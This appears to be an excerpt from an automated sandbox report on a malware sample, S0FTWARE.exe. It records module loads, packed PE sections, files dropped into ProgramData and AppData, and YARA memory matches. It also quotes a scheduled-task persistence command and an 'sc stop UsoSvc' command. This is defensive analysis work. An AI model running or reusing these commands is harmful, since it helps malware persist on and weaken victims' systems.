                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeSection loaded: apphelp.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: apphelp.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: windows.storage.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: wldp.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: kernel.appcore.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: uxtheme.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: propsys.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: profapi.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: edputil.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: urlmon.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: iertutil.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: srvcli.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: netutils.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: sspicli.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: wintypes.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: appresolver.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: bcp47langs.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: slc.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: userenv.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: sppc.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                        Source: Google Drive.lnk.5.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                        Source: YouTube.lnk.5.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                        Source: Sheets.lnk.5.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                        Source: Gmail.lnk.5.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                        Source: Slides.lnk.5.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                        Source: Docs.lnk.5.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: S0FTWARE.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                        Source: S0FTWARE.exe Static file information: File size 26859520 > 1048576
                        Source: S0FTWARE.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0xbf8400
                        Source: S0FTWARE.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xb02a00
                        Source: S0FTWARE.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1fd400
                        Source: S0FTWARE.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: BitLockerToGo.exe, 00000003.00000002.3382859208.000000006F8DD000.00000002.00000001.01000000.00000013.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: freebl3.pdb source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: freebl3.pdbp source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: nss3.pdb@ source: BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
                        Source: Binary string: BitLockerToGo.pdb source: S0FTWARE.exe, 00000000.00000002.2242921904.0000000012CB6000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: BitLockerToGo.exe, 00000003.00000002.3374753902.0000000035DB4000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: BitLockerToGo.exe, 00000003.00000002.3370381452.0000000029ED5000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: nss3.pdb source: BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
                        Source: Binary string: mozglue.pdb source: BitLockerToGo.exe, 00000003.00000002.3382859208.000000006F8DD000.00000002.00000001.01000000.00000013.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmp
                        Source: Binary string: BitLockerToGo.pdbGCTL source: S0FTWARE.exe, 00000000.00000002.2242921904.0000000012CB6000.00000004.00001000.00020000.00000000.sdmp
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1A132 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_02A1A132
                        Source: initial sample, Static PE information: section where entry point is pointing to: .vmp$
                        Source: softokn3.dll.3.dr, Static PE information: real checksum: 0x46753 should be: 0x38bc1
                        Source: S0FTWARE.exe, Static PE information: section name: .symtab
                        Source: nss3.dll.3.dr, Static PE information: section name: .00cfg
                        Source: AAFIJKKEHJ.exe.3.dr, Static PE information: section name: .00cfg
                        Source: AAFIJKKEHJ.exe.3.dr, Static PE information: section name: .vmp$
                        Source: AAFIJKKEHJ.exe.3.dr, Static PE information: section name: .vmp$
                        Source: AAFIJKKEHJ.exe.3.dr, Static PE information: section name: .vmp$
                        Source: NewApp[1].exe.3.dr, Static PE information: section name: .00cfg
                        Source: NewApp[1].exe.3.dr, Static PE information: section name: .vmp$
                        Source: NewApp[1].exe.3.dr, Static PE information: section name: .vmp$
                        Source: NewApp[1].exe.3.dr, Static PE information: section name: .vmp$
                        Source: GHDAKKJJJK.exe.3.dr, Static PE information: section name: .eh_fram
                        Source: GHDAKKJJJK.exe.3.dr, Static PE information: section name: .vmp$
                        Source: GHDAKKJJJK.exe.3.dr, Static PE information: section name: .vmp$
                        Source: GHDAKKJJJK.exe.3.dr, Static PE information: section name: .vmp$
                        Source: Updater[1].exe.3.dr, Static PE information: section name: .eh_fram
                        Source: Updater[1].exe.3.dr, Static PE information: section name: .vmp$
                        Source: Updater[1].exe.3.dr, Static PE information: section name: .vmp$
                        Source: Updater[1].exe.3.dr, Static PE information: section name: .vmp$
                        Source: freebl3.dll.3.dr, Static PE information: section name: .00cfg
                        Source: mozglue.dll.3.dr, Static PE information: section name: .00cfg
                        Source: msvcp140.dll.3.dr, Static PE information: section name: .didat
                        Source: softokn3.dll.3.dr, Static PE information: section name: .00cfg
                        Source: Updater.exe.20.dr, Static PE information: section name: .00cfg
                        Source: Updater.exe.20.dr, Static PE information: section name: .vmp$
                        Source: Updater.exe.20.dr, Static PE information: section name: .vmp$
                        Source: Updater.exe.20.dr, Static PE information: section name: .vmp$
                        Source: service.exe.54.dr, Static PE information: section name: .eh_fram
                        Source: service.exe.54.dr, Static PE information: section name: .vmp$
                        Source: service.exe.54.dr, Static PE information: section name: .vmp$
                        Source: service.exe.54.dr, Static PE information: section name: .vmp$
                        Source: C:\Users\user\Desktop\S0FTWARE.exe, Code function: 0_3_12E9D50C push edi; ret 0_3_12E9E245
                        Source: C:\Users\user\Desktop\S0FTWARE.exe, Code function: 0_3_12E9D98A push edi; ret 0_3_12E9E245
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, Code function: 3_2_02A309C2 push ecx; ret 3_2_02A309D5
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, Code function: 3_2_02A1F635 push ecx; ret 3_2_02A1F648
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, Code function: 3_2_02A245B9 push esi; ret 3_2_02A245BB
                        Source: C:\ProgramData\AAFIJKKEHJ.exe, Code function: 20_2_00007FF6AD6D1394 push dword ptr [00016C01h]; ret 20_2_00007FF6AD6D1403
                        Source: C:\ProgramData\AAFIJKKEHJ.exe, Code function: 20_2_00007FF6AD6D7EAA push edx; iretd 20_2_00007FF6AD6D7EAB
                        Source: C:\ProgramData\AAFIJKKEHJ.exe, Code function: 20_2_00007FF6AD6D7E81 push ebx; iretd 20_2_00007FF6AD6D7E82
                        Source: C:\ProgramData\AAFIJKKEHJ.exe, Code function: 20_2_00007FF6AD6D872E push cs; ret 20_2_00007FF6AD6D872F
                        Source: C:\ProgramData\AAFIJKKEHJ.exe, Code function: 20_2_00007FF6AD6D8305 push edi; retf 20_2_00007FF6AD6D8306
                        Source: C:\ProgramData\AAFIJKKEHJ.exe, Code function: 20_2_00007FF6AD6D7D8B push ecx; retn 0050h 20_2_00007FF6AD6D7D8C
                        Source: C:\ProgramData\AAFIJKKEHJ.exe, Code function: 20_2_00007FF6AD6DD136 push edx; ret 20_2_00007FF6AD6DD137
                        Source: C:\ProgramData\AAFIJKKEHJ.exe, Code function: 20_2_00007FF6AD6D84A6 push ds; retf 0050h 20_2_00007FF6AD6D84A7
                        Source: C:\ProgramData\AAFIJKKEHJ.exe, Code function: 20_2_00007FF6AD6D8470 push esp; retf 0050h 20_2_00007FF6AD6D8471
                        Source: C:\ProgramData\AAFIJKKEHJ.exe, Code function: 20_2_00007FF6AD6D8C46 push ebp; ret 20_2_00007FF6AD6D8C47
                        Source: C:\ProgramData\AAFIJKKEHJ.exe, Code function: 20_2_00007FF6AD6D8C38 push esp; ret 20_2_00007FF6AD6D8C39
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File created: C:\ProgramData\nss3.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Updater[1].exe
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File created: C:\ProgramData\mozglue.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File created: C:\ProgramData\AAFIJKKEHJ.exe
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File created: C:\ProgramData\GHDAKKJJJK.exe
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File created: C:\ProgramData\msvcp140.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\NewApp[1].exe
                        Source: C:\Users\user\AppData\Roaming\service.exe, File created: C:\Windows\SysWOW64\0X1.9B5680P-1008PPDATA\service.exe (copy)
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File created: C:\ProgramData\freebl3.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File created: C:\ProgramData\vcruntime140.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exe, File created: C:\Users\user\AppData\Roaming\service.exe
                        Source: C:\ProgramData\AAFIJKKEHJ.exe, File created: C:\ProgramData\GoogleUP\Chrome\Updater.exe
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File created: C:\ProgramData\softokn3.dll

                        Boot Survival

                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                        Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                        Source: C:\ProgramData\AAFIJKKEHJ.exe, Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, Code function: 3_2_02A1A132 GetProcAddress (repeated), LoadLibraryA (repeated), GetProcAddress (repeated), 3_2_02A1A132
                        Source: C:\Users\user\Desktop\S0FTWARE.exe, Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\S0FTWARE.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\GHDAKKJJJK.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\service.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: Yara matchFile source: 3.2.BitLockerToGo.exe.2a00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13780000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13556000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138bdec0.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13780000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13556000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13880000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.138c6000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138c6000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13780000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13780000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.138bdec0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138bdec0.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13880000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13880000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138c6000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2190543178.0000000013800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 744, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6152, type: MEMORYSTR
                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: C05172
                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: BFEBEC
                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: 74880F
                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: 7EF0C8
